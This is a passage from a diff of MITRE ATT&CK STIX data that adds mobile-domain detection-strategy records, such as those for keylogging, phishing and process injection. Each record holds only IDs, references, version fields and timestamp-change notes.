+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Keychain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b2ef244c-b230-4c2b-b0a6-070e5c376f32"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f15826e8-4aa6-497e-bf9f-16c3724bfe72",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0661",
+                            "external_id": "DET0661"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Keylogging",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8c29fa0f-6b35-40c2-9c99-081a0997db86",
+                        "x-mitre-analytic--7f8717e8-fea8-42db-b60c-c64375630685"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--effced27-7981-400b-9f22-e3c28144258f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0716",
+                            "external_id": "DET0716"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Linked Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--42ce5243-8859-49dc-b221-2674536063ff",
+                        "x-mitre-analytic--758e4b0e-3564-4696-8d57-9e3d81198d52"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ac9d1b33-cfba-415e-aef2-c4c0b359ed5f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0675",
+                            "external_id": "DET0675"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Location Tracking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--83b759ca-097c-4d9f-926b-fb41e0740644",
+                        "x-mitre-analytic--f34fef81-f714-4e26-ae99-3c970959cd0d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--338779e6-0413-43e3-bfc8-71064a27ebeb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0645",
+                            "external_id": "DET0645"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Lockscreen Bypass",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--52a370ec-dca2-45e0-bba7-7384816945e8",
+                        "x-mitre-analytic--81a49b9b-c8cf-438c-bea0-e09149f50b34"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d314d955-a323-4e87-a8e5-317b0b8ed203",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0715",
+                            "external_id": "DET0715"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Masquerading",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b6d679b6-0777-4541-874c-d81f37d8fb07",
+                        "x-mitre-analytic--ff9c219a-b8e7-4b0a-8ea5-4f81341375d1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--91b70fb4-8e86-4dd2-a988-33d64cc46d4e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0609",
+                            "external_id": "DET0609"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Match Legitimate Name or Location",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8f5e4bee-0677-41dd-89ad-8a467ae08eec",
+                        "x-mitre-analytic--155b0dfd-15d5-45bd-a8c4-249adc52f20d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--10403bf9-7ba1-427a-9320-b4069d2c2eff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0717",
+                            "external_id": "DET0717"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Native API",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4ec34db8-7214-4059-925e-bdcd58bca391"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--86f11b86-e189-47f1-8436-e46c7f0a4a69",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0639",
+                            "external_id": "DET0639"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Denial of Service",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bfbe9c72-f373-4d03-a08a-1448f31dd92f",
+                        "x-mitre-analytic--1e8d1470-1e76-4f6f-b2c9-633800c4478a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--070d40c8-1aad-47e4-93d7-05e0362f437b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0696",
+                            "external_id": "DET0696"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Service Scanning",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f420e242-1e51-4d1a-b063-b15240283e1f",
+                        "x-mitre-analytic--9eeb7425-6979-4f77-aa7c-f9b0fe6b710e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7a921c8c-fdc6-4526-aba6-2632360b7f0f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0706",
+                            "external_id": "DET0706"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Non-Standard Port",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b6ef77d6-cc8b-478c-b7f8-7767bbb58960",
+                        "x-mitre-analytic--7c96d701-391d-4904-b6ba-941344aaf059"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7c507410-2dc7-4159-88ec-b2228547ae67",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0720",
+                            "external_id": "DET0720"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Obfuscated Files or Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6fb4668b-9c70-44d2-87a3-43ff2dc699f2",
+                        "x-mitre-analytic--739bd746-e98b-45cb-8bc6-3c8876745b4a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3ec475a9-b33f-42b3-a1b1-755b5fa9389b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0610",
+                            "external_id": "DET0610"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of One-Way Communication",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ddebe043-2017-44ba-96e5-cbe87916511b",
+                        "x-mitre-analytic--dec6e0d3-f4ae-48ed-90b9-ee32fd7e8dc6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d9ca9fb7-01dd-465c-86a1-a48b6812b1c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0688",
+                            "external_id": "DET0688"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Out of Band Data",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f1e295df-0598-4263-b7c4-737d66660bbe",
+                        "x-mitre-analytic--3d12c26c-740d-4393-9659-52a424586b20"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0546176b-5ea4-407d-acb7-382b55c7e883",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0684",
+                            "external_id": "DET0684"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Phishing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cd82f432-ee4e-4df0-8500-e381b36479ec",
+                        "x-mitre-analytic--07b782b2-7e86-424a-9395-0a862d9b25c3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7a9d4531-4ff8-4228-8abd-29da8bd2942f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0598",
+                            "external_id": "DET0598"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Prevent Application Removal",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--23a1b062-847e-4912-8e5e-5b69867af4a4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0e600ee5-de14-46f8-ada2-c0aee4ce969e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0692",
+                            "external_id": "DET0692"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Process Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5c5225c4-2d35-431e-830d-ea1cc649c6ba",
+                        "x-mitre-analytic--5d07c07e-4cde-41b9-a03e-94be43ca9bb8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b76b67bc-d38b-4b63-a0d0-ebfc7f829db6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0632",
+                            "external_id": "DET0632"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Process Injection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--63e33566-c46c-45b8-acf1-247327b827e1",
+                        "x-mitre-analytic--166d394c-6d24-46d3-866e-4f57ca849e90"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--48e300f8-190e-46fa-a56d-8701f7a152d3",
